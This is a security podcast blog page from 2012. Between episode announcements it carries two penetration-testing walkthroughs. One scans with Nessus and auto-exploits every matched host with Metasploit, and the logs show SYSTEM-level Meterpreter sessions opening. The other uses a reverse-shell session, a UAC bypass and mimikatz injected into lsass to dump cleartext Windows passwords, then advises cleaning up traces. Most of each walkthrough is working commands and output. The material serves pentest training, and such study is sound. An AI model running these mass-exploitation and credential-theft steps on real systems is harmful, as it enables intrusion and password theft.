2/23/2012 noon UPDATE: Cancelled due to circumstances beyond our control (illness).

We'll make sure to reschedule for a later date!

Episode 279 of PaulDotCom Security Weekly will feature a special interview with Gene Kim, former CTO of Tripwire, and a special Guest Technical Segment with Doug Burks on Security Onion. Come participate in our IRC channel or sit back and enjoy it live via the link below:

Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Night episodes on our YouTube Channel or our Bliptv channel.

Jeremiah Grossman Interview:

Episode 278 Show Notes

Episode 278 - Direct Audio Download (mp3)

Episode Hosts:

Audio Feeds:

Video Feeds:

With the recent release of Nessus 5 it comes with several improvements like better filtering in policy creation, analysis, reporting and a faster lighter engine for scanning. From this new features my favorite one is the ability to do filtering when creating new policies and analyzing results. For a very long time I kept a hand written list of plugins IDs that identified some of the most common found vulnerabilities that Metasploit covered for user with nessuscmd in my engagement. Now with the new filtering features that lets me select only those checks that cover vulnerabilities whose exploits are in exploit Frameworks like Core Impact and CANVAS, also one can filter for remote exploits or local ones also. In this blog post I will cover how to create a policy that covers all exploits found in Metasploit both local and remote. We will start by logging in to Nessus web interface and clicking on the Policies.

Once in policies we click on Add to be brought to the following screes where we can create one, we will put a name and brief description on the policy and let the rest as default:

We can go to the next section by clicking on Next and on this screen we can enter any credentials we may have as well as NTLM hashes for Windows credentials in the passwords field allowing for enumerating local vulnerabilities that might be on the target:

We now move to the plugin section by clicking on Next:

We start by clicking on  Disable All and then click on Add Filter to create a new filter for the plugins. we set the filter for Metasploit Exploit Framework,set the action  is equal to and value to true, we then click on Save to apply the filter:

To enable the plugins in each family we click on the family name text being careful not to click in the circle beside the name and then we click on Enable Plugins at the top of the plugin list: 

Now we click on Next then on Save to save the policy.

Once saved we can use the nessus plugin from the console to connect to the scanner and use it from inside Metasploit. You can use the console in Armitage, MSFConsole or the one in Metasploit Community/Pro/Express to load the plugin for use:

msf > load nessus 
[*] Nessus Bridge for Metasploit 1.1
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus

Once the plugin is loaded we can connect to the host that is running the Nessus server using the nessus_connect command and list the policies we have available to us with nessus_policy_list:

msf > nessus_connect carlos:contasena@localhost ok
[*] Connecting to https://localhost:8834/ as carlos
[*] Authenticated
msf > nessus_policy_list 
[+] Nessus Policy List
[+] 
ID  Name                        Comments
--  ----                        --------
-1  External Network Scan       
-2  Internal Network Scan       
-3  Prepare for PCI DSS audits  
-4  Web App Tests               
6   Metasploit Exploits         

We can now use the policy to perform a scan of a network by using the policy ID, name for the scan and specifying a range using the nessus_scan_new command:

msf > nessus_scan_new 6 "contoso pentest" 192.168.1.1-241
[*] Creating scan from policy number 6, called "contoso pentest" and scanning 192.168.1.1-241
[*] Scan started.  uid is 396a6c4f-e8ab-c752-6ee1-5bc3c13303df24456a407318b554

We can monitor the status of the scan using the command nessus_scan_status:

msf > nessus_scan_status 
[+] Running Scans
[+] 
Scan ID                                               Name             Owner   Started            Status   Current Hosts  Total Hosts
-------                                               ----             -----   -------            ------   -------------  -----------
396a6c4f-e8ab-c752-6ee1-5bc3c13303df24456a407318b554  contoso pentest  carlos  11:53 Feb 16 2012  running  217            241
[+] 
[*] You can:
[+]         Import Nessus report to database :     nessus_report_get <reportid>
[+]         Pause a nessus scan :             nessus_scan_pause <scanid>
msf >

Once we can see that the scan is no longer running we can access the report using from the scan using the nessus_report_list command to see its name and ID:

msf > nessus_report_list 
[+] Nessus Report List
[+] 
ID                                                    Name             Status     Date
--                                                    ----             ------     ----
396a6c4f-e8ab-c752-6ee1-5bc3c13303df24456a407318b554  contoso pentest  completed  11:58 Feb 16 2012
[*] You can:
[*]         Get a list of hosts from the report:          nessus_report_hosts <report id>

Now that we have the report ID we can import it but before we do that we must first create a workspace to hose the data so as to keep it separated from any other data we may already be housing in the Metasploit default wroksapace and we use the nessus_report_get command to import the report:

msf > workspace -a contoso
[*] Added workspace: contoso
msf > nessus_report_get 396a6c4f-e8ab-c752-6ee1-5bc3c13303df24456a407318b554
[*] importing 396a6c4f-e8ab-c752-6ee1-5bc3c13303df24456a407318b554
[*] 192.168.1.99
[*] 192.168.1.241
[*] 192.168.1.237
[*] 192.168.1.235
[*] 192.168.1.234
[*] 192.168.1.230
[*] 192.168.1.223
[*] 192.168.1.2
[*] 192.168.1.192
[*] 192.168.1.156
[*] 192.168.1.155
[*] 192.168.1.154
[*] 192.168.1.153
[*] 192.168.1.146
[*] 192.168.1.143
[*] 192.168.1.134
[*] 192.168.1.113
[*] 192.168.1.109
[*] 192.168.1.102
[*] 192.168.1.100
[*] 192.168.1.1
[+] Done

After the import you can look at the vulnerabilities found by using the vulns command:

msf > vulns
[*] Time: 2012-02-16 16:01:44 UTC Vuln: host=192.168.1.1 port=443 proto=tcp name=Nessus SYN scanner refs=NSS-11219
[*] Time: 2012-02-16 16:01:37 UTC Vuln: host=192.168.1.2 port=111 proto=tcp name=Nessus SYN scanner refs=NSS-11219
[*] Time: 2012-02-16 16:01:37 UTC Vuln: host=192.168.1.2 port=445 proto=tcp name=Microsoft Windows SMB Log In Possible refs=MSF-Microsoft Windows Authenticated User Code Execution,NSS-10394
[*] Time: 2012-02-16 16:01:32 UTC Vuln: host=192.168.1.99 port=445 proto=tcp name=MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution (958644) (uncredentialed check) refs=CVE-2008-4250,BID-31874,OSVDB-49243,IAVA-2008-A-0081,MSFT-MS08-067,CWE-94,MSF-Microsoft Server Service Relative Path Stack Corruption,NSS-34477
[*] Time: 2012-02-16 16:01:32 UTC Vuln: host=192.168.1.99 port=53 proto=tcp name=Nessus SNMP Scanner refs=NSS-14274
[*] Time: 2012-02-16 16:01:32 UTC Vuln: host=192.168.1.99 port=445 proto=tcp name=Microsoft Windows SMB Log In Possible refs=MSF-Microsoft Windows Authenticated User Code Execution,NSS-10394
[*] Time: 2012-02-16 16:01:40 UTC Vuln: host=192.168.1.100 port=59159 proto=tcp name=netstat portscanner (SSH) refs=NSS-14272
[*] Time: 2012-02-16 16:01:40 UTC Vuln: host=192.168.1.102 port=62078 proto=tcp name=Nessus SYN scanner refs=NSS-11219
[*] Time: 2012-02-16 16:01:40 UTC Vuln: host=192.168.1.109 port=62078 proto=tcp name=Nessus SYN scanner refs=NSS-11219
.......

Once we confirm that vulnerabilities where found we can use the auto_exploit plugin I wrote and updated for this blogpost, it can be found at https://github.com/darkoperator/Metasploit-Plugins/blob/master/auto_exploit.rb you just need to put a copy of it in your OSX/Linux host in to ~/.msf4/plugins so as to be able to use it. We start by loading it and looking at the options of the vuln_exploit command that will allow us to exploit the hosts found to be vulnerable:

msf > load auto_exploit 
[*] auto_exploit plug-in loaded.
[*] Successfully loaded plugin: auto_exploit
msf > vuln_exploit -h
OPTIONS:
    -f <opt>  Provide a comma separated list of IP's and Ranges to skip when running exploits.
    -h        Command Help
    -j <opt>  Max number of concurrent jobs, 3 is the default.
    -m        Only show matched exploits.
    -r <opt>  Minimum Rank for exploits (low, average,normal,good,great and excellent) good is the default.
    -s        Do not limit number of sessions to one per target.

To launch the exploits found we just use the vuln_exploit command, this will analyze the vulnerabilities found and match them modules in the framework launching by default 3 exploits at a time auto configured with the best possible payload for the platform and limiting to one session per host:

msf > vuln_exploit
[*] Generating List for Matching...
[*] Matching Exploits (This will take a while depending on number of hosts)...
[+] Matched Exploits:
[+]     192.168.1.153 exploit/windows/smb/ms08_067_netapi 445 500
[+]     192.168.1.113 exploit/windows/smb/ms08_067_netapi 445 500
[+]     192.168.1.99 exploit/windows/smb/ms08_067_netapi 445 500
[+]     192.168.1.192 exploit/windows/smb/ms08_067_netapi 445 500
[+]     192.168.1.153 exploit/windows/dcerpc/ms03_026_dcom 135 500
[+]     192.168.1.154 exploit/linux/samba/lsa_transnames_heap 445 400
[+]     192.168.1.113 exploit/windows/smb/ms06_040_netapi 445 400
[+]     192.168.1.153 exploit/windows/smb/ms04_011_lsass 445 400
[+]     192.168.1.153 exploit/windows/smb/ms06_040_netapi 445 400
[+]     192.168.1.153 exploit/windows/smb/ms05_039_pnp 445 400
[+]     192.168.1.153 exploit/windows/smb/ms04_007_killbill 445 100
[*] Running Exploits:
[*] Running exploit/windows/smb/ms08_067_netapi against 192.168.1.153
[*] Started reverse handler on 192.168.1.241:29271 
[*] Running exploit/windows/smb/ms08_067_netapi against 192.168.1.113
[*] Automatically detecting the target...
[*] Started reverse handler on 192.168.1.241:4643 
[*] Running exploit/windows/smb/ms08_067_netapi against 192.168.1.99
[*] Started reverse handler on 192.168.1.241:14900 
[*] Automatically detecting the target...
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Fingerprint: Windows 2000 - Service Pack 4 with MS05-010+ - lang:English
[*] Selected Target: Windows 2000 Universal
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.99
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.153
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.113
[*] waiting for finishing some modules... active jobs: 3 / threads: 16
[*] Meterpreter session 1 opened (192.168.1.241:14900 -> 192.168.1.99:1513) at 2012-02-16 12:54:23 -0400
[*] Meterpreter session 2 opened (192.168.1.241:29271 -> 192.168.1.153:2709) at 2012-02-16 12:54:23 -0400
[*] Meterpreter session 3 opened (192.168.1.241:4643 -> 192.168.1.113:4035) at 2012-02-16 12:54:23 -0400
[*] waiting for finishing some modules... active jobs: 0 / threads: 19
[*] Running exploit/windows/smb/ms08_067_netapi against 192.168.1.192
[+]     Skipping 192.168.1.153 exploit/windows/dcerpc/ms03_026_dcom because a session already exists.
[*] Started reverse handler on 192.168.1.241:15430 
[*] Running exploit/linux/samba/lsa_transnames_heap against 192.168.1.154
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[+]     Skipping 192.168.1.113 exploit/windows/smb/ms06_040_netapi because a session already exists.
[*] Started reverse handler on 192.168.1.241:48452 
[+]     Skipping 192.168.1.153 exploit/windows/smb/ms04_011_lsass because a session already exists.
[*] Creating nop sled....
[+]     Skipping 192.168.1.153 exploit/windows/smb/ms06_040_netapi because a session already exists.
[+]     Skipping 192.168.1.153 exploit/windows/smb/ms05_039_pnp because a session already exists.
[+]     Skipping 192.168.1.153 exploit/windows/smb/ms04_007_killbill because a session already exists.
[*] Trying to exploit Samba with address 0xffffe410...
[*] Connecting to the SMB service...
[*] Attempting to trigger the vulnerability...
msf > [*] Sending stage (752128 bytes) to 192.168.1.192
[*] Meterpreter session 4 opened (192.168.1.241:15430 -> 192.168.1.192:1597) at 2012-02-16 12:54:29 -0400

We can now take a look at the sessions found using the sessions command:

msf > sessions 
Active sessions
===============
  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ CARLOS-CD652C1C  192.168.1.241:14900 -> 192.168.1.99:1513
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WIN2KADV01       192.168.1.241:29271 -> 192.168.1.153:2709
  3   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ TEST-01BCDAF47C  192.168.1.241:4643 -> 192.168.1.113:4035
  4   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DBSQL2K01        192.168.1.241:15430 -> 192.168.1.192:1597

As you can see the mix of the the new filtering in Nessus 5 with the Nessus plugin and my auto_exploit plugin allows to one be less noisy and more tactical when it comes to exploitation when used in conjunction. Hope you found this blog post informative and useful as always.

Ever have that moment where hashes just aren't good enough? Where you don't have time or power to brute force a 15 character NTLM password? Well, if you were able to dump hashes in the first place, then you've already achieved the necessary pre-requisites to dump the passwords in clear text. Yes... you read that correctly, clear text.

A few days ago I was catching up on my Google Reader feed and ran into this great post on pentestmonkey.net about a tool called mimikatz. ... Great blog by the way. I highly recommend it. ... It got me thinking, "This technique works great locally, but what would it take to get it working remotely via meterpreter?" And off I went to play.

First, the usual setup, remote meterpreter on a Windows 7 box.

root@EyeHakUNow:~# msfcli exploit/multi/handler payload=windows/meterpreter/reverse_tcp lhost=192.168.1.15 E
payload => windows/meterpreter/reverse_tcp
lhost => 192.168.1.15
[*] Started reverse handler on 192.168.1.15:4444 
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.14
[*] Meterpreter session 1 opened (192.168.1.15:4444 -> 192.168.1.14:51968) at 2012-02-15 20:42:15 -0500

The first thing I tried was using the meterpreter 'execute' command to launch the local mimikatz binary in memory on the remote host. Unfortunately, mimikatz relies on external files to function, so this failed. A quick fail, but we still have options. One being old fashion upload and execute. I uploaded the mimikatz binary and necessary dependencies using the meterpreter 'upload' command...

meterpreter > cd \
meterpreter > mkdir temp
Creating directory: temp
meterpreter > cd temp
meterpreter > upload /root/tools/mimikatz/x64/mimikatz.exe .
[*] uploading  : /root/tools/mimikatz/x64/mimikatz.exe -> .
[*] uploaded   : /root/tools/mimikatz/x64/mimikatz.exe -> .\mimikatz.exe
meterpreter > upload /root/tools/mimikatz/x64/sekurlsa.dll .
[*] uploading  : /root/tools/mimikatz/x64/sekurlsa.dll -> .
[*] uploaded   : /root/tools/mimikatz/x64/sekurlsa.dll -> .\sekurlsa.dll
meterpreter > ls

Listing: C:\temp
================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2012-02-15 20:43:11 -0500  .
40777/rwxrwxrwx   0       dir   1980-01-01 00:00:00 -0500  ..
100777/rwxrwxrwx  657392  fil   2012-02-15 20:43:03 -0500  mimikatz.exe
100666/rw-rw-rw-  265200  fil   2012-02-15 20:43:12 -0500  sekurlsa.dll

...dropped to a shell, and executed mimikatz. I was able to access the mimikatz console, but when I tried to inject into the lsass process, I received what appeared to be a permissions error. It was hard to tell since all application output and documentation is written in French. More on this later. One of two things was stopping me: either I didn't have enough privileges, or UAC was getting in the way. I began working my way through the problem using trial and error. The first thing I tried was to get system level privileges.

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.

Okay... plan 'B'. UAC must be the issue. I ran the 'bypassuac' post module.

meterpreter > run post/windows/escalate/bypassuac 
[*] Started reverse handler on 192.168.1.15:4444 
[*] Starting the payload handler...
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem....
[*] Sending stage (752128 bytes) to 192.168.1.14
[*] Meterpreter session 2 opened (192.168.1.15:4444 -> 192.168.1.14:51969) at 2012-02-15 20:43:41 -0500
[*] Session ID 2 (192.168.1.15:4444 -> 192.168.1.14:51969) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: pMTllsDttene.exe (2308)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1128
[+] Successfully migrated to process 

Awesome, UAC bypassed. I jumped into the new session, dropped to a shell, loaded up the mimikatz console, and attempted the injection again.

meterpreter > background
msf  exploit(handler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > cd \
meterpreter > cd temp
meterpreter > shell
Process 2444 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\temp>mimikatz
mimikatz
mimikatz 1.0 x64 (alpha)	/* Traitement du Kiwi (Feb  9 2012 01:49:24) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 512
Attente de connexion du client...
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
			Gentil Kiwi

SekurLSA : librairie de manipulation des données de sécurités dans LSASS

mimikatz # @getLogonPasswords

Authentification Id         : 0;129433
Package d'authentification  : NTLM
Utilisateur principal       : LaNMaSteR
Domaine d'authentification  : WIN-8GLMSQD3GDE
	msv1_0 : 	lm{ 00000000000000000000000000000000 }, ntlm{ d6ca08f8c9f57f208b4f746c3cf0d667 }
	wdigest : 	reallygoodpassword
	tspkg : 	reallygoodpassword
...
mimikatz # 

Holy crap! Is that a password in clear text? Yes... it is. In all its glory. Now you can do all of those great things you couldn't do with pass-the-hash... which isn't much. But it's just nice to see the password in clear text isn't it? I thought so.

To rehash:
1. Get shell.
2. Bypass UAC.
3. Upload binary and dependencies.
4. Enter mimikatz console.
5. Inject into lsass and pull creds.
6. Exit mimikatz console.
7. Clean up files and processes (details below).

Some things to consider...

1. Wdigest seems to be the main culprit here. Windows is storing the password to use for wdigest authentication. Interesting to think what else may be exploitable here. There very well may be a way to turn this off in the registry or security policy, but I have not explored it to that level yet. More to come perhaps.

2. All of the documentation, and standard/error output of program itself, is in French. I used Google Translate to read the documentation on the site, which was pretty garbled, but worked enough to make sense of the important details. In the comments on one of the author's blog entries, someone asked where the English version was and mentioned that the tool would get more attention if there was an English version. The author replied with something along the lines of, "What makes you think I want more attention?" Hopefully he doesn't mind the world's largest security blog writing about it...

3. Don't forget to clean up after yourself. If you're uploading and executing, your placing files on the remote filesystem. Make sure you delete them before you leave. Also, the 'bypassuac' post module makes a mess of processes on the remote system. You may want to clean those up before leaving too. The above steps consistently leave the following 8 new process running in addition to the existing ones. 3 of them have randomly generated names. It's obvious which ones.

evil.exe
JMjFkkeww.exe
conhost.exe
tior.exe
conhost.exe
cmd.exe
edMTUOe.exe
notepad.exe

4. Mimikatz comes packaged with psexec and works quite well with it. The downside is, you need to have credentials to use psexec in the first place.

5. Wouldn't something like this make a great post module? Calling all Ruby devs!!!

Tonight will feature Mr. Web Security himself, the one and only Jeremiah Grossman, Founder and Chief Technology Officer of WhiteHat Security for Episode 278 of PaulDotCom Security Weekly. Come participate in our IRC channel or sit back and enjoy it live via the link below:

For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, or if you prefer, visit the Episode 278 show notes page.

- Paul Asadoorian, Larry Pesce, Jack Daniel. Carlos Perez, John Strand, Darren Wigley, and Mike Perez.

Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Night episodes on our YouTube Channel or our Bliptv channel.

Adam Shostack Interview:

Drunken Security News Weekly #277:

Episode 277 Show Notes

Episode 277 - Direct Audio Download (mp3)

Episode Hosts:

Audio Feeds:

Video Feeds:

Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Night episodes on our YouTube Channel or our Bliptv channel.

Joe Stewart on Malware Analysis:

UPnP Hacking with Backtrack 5 & Python:

Drunken Security News Weekly - #276:

Episode 276 Show Notes

Episode 276 - Part 1 - Direct Audio Download

Episode 276 - Part 2 - Direct Audio Download

Episode Hosts:

Audio Feeds:

Video Feeds:

In this edition we talk about Finger Zombies, Security Architecture, and the Foxconn attack.

Links for this Episode:

1. TrustWave.. WTH?


2. UAC Fun


3. FoxConn Hacked


4. Offensive Countermeasures in Orlando!

Video Feeds:

Episode 277 of PaulDotCom Security Weekly will take us back to school with one of the authors of the The New School of Information Security, Adam Shostack. Come participate in our IRC channel or sit back and be "schooled" live via the link below:

For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, or if you prefer, visit the Episode 277 show notes page.

- Paul Asadoorian, Larry Pesce, Jack Daniel. Carlos Perez, John Strand, Darren Wigley, and Mike Perez.

In this episode we talk about Symantec. We introduce a very cool SpearPhishing tool (which is free), the VeriSign attack and we discuss RFID implications and microwave cooking directions for credit cards.

Links for this Episode:

1. New SpearPhising tool


2. VeriSign Hack


3. RFID and Credit Cards.


4. Offensive Countermeasures in Orlando!

Video Feeds: